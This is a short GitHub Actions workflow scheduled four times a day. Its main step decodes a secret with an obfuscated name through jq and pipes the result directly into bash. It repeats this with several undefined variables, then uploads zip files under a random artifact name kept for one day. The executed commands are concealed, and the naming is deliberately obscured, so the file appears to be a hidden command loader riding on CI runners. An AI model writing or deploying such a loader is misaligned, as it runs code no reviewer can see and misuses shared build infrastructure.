name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '51 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          lktn4: ${{ secrets.lktn4 }}
        run: |
          printf '%s' "$lktn4" | jq -r .xq7999 | /bin/bash
          echo $cvu069 | jq -r .kfc77441 | /bin/bash
          echo $qbqe3771 | jq -r .sn3 | /bin/bash
          printf '%s' "$a1" | jq -r .yysq60 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 4sZzKVG5
          path: "*.zip"
          retention-days: 1
